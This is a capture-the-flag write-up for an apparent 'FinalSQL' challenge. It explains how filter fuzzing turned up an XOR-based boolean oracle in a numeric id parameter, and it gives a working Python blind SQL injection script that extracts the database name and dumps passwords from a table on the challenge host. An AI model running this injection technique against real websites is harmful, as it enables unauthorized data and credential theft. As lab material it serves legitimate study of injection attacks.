- Items 1 through 5 have all been clicked; visiting id=6 returns the hint `Clever! But not this table.`
- So the guess is that the SQL injection lives in the id parameter here, not in a login form as in the earlier challenges.
- A first look suggests a numeric injection with some characters filtered, so the filter needs fuzzing.
- Spaces are filtered, so parentheses `()` take their place; union and friends are pretty much all filtered too.
- The name FinalSQL suggests this will be a blind-injection challenge, heh.
- `^` (XOR) is not filtered, which is the opening: with `id=1^1^(cond)` the id becomes `0^cond`, i.e. 1 (the page that contains "Click") when the condition is true and 0 (no such row) when it is false, a clean boolean oracle.
- The challenge hints that this is blind injection, so it comes down to running a script.
```python
import requests
import sys
import time

# Boolean-blind oracle. The injection is numeric: id=1^1^(cond). Since 1^1 = 0,
# the id becomes 0^cond = cond, i.e. id=1 (a page containing "Click") when cond
# is true and id=0 (no row) when it is false. The filter strips spaces, so every
# argument list is wrapped in parentheses instead. The original appended "#" to
# each payload; requests treats a bare "#" as a URL fragment and never sends it,
# and a numeric injection has nothing to comment out, so it is dropped here.
TRUE_MARKER = "Click"

session = requests.Session()


def check(url, cond):
    """Return True if the boolean SQL condition `cond` holds on the server."""
    r = session.get(url + "1^1^(%s)" % cond)
    return TRUE_MARKER in r.text


def search_char(url, expr, pos, lo=0, hi=127):
    """Binary-search the value of ascii(substr(expr, pos, 1)).

    Invariant: ascii(...) >= lo is true. ascii('') is 0 in MySQL, so a position
    past the end of the string comes back as 0, which the callers use as the
    terminator (the original relied on the search bottoming out at Mid == 31
    for the same purpose).
    """
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if check(url, "ascii(substr((%s),%d,1))>=%d" % (expr, pos, mid)):
            lo = mid
        else:
            hi = mid - 1
    return lo


def get_DBlen(url):
    for i in range(1, 20):
        if check(url, "length(database())=%d" % i):
            print("database name length: %d" % i)
            return i
    # The original returned None here and the next call crashed on it.
    sys.exit("database name length not found")


def get_DBname(url, length):
    DBname = ""
    for i in range(1, length + 1):
        DBname += chr(search_char(url, "database()", i))
        print(DBname)
    return DBname


def get_passwords(url):
    """Dump group_concat(password) from table F1naI1y one character at a time.

    (Named get_TBname in the original, although it reads passwords, not table names.)
    """
    name = ""
    i = 0
    while True:
        i += 1
        c = search_char(url, "select(group_concat(password))from(F1naI1y)", i)
        if c == 0:  # ascii('') = 0: ran off the end of the string
            break
        name += chr(c)
        print(name)
        time.sleep(0.5)  # be gentle with the shared CTF instance
    return name


if __name__ == "__main__":
    url = "http://ff1a7c21-003a-43f1-85ec-8bbd9c55b53a.node3.buuoj.cn/search.php?id="
    db_Len = get_DBlen(url)
    db_Name = get_DBname(url, db_Len)
    passwords = get_passwords(url)
```
- A gripe: this script went wrong two or three times while I was running it for the flag, and in the end I fixed it by hand…
- Script modified.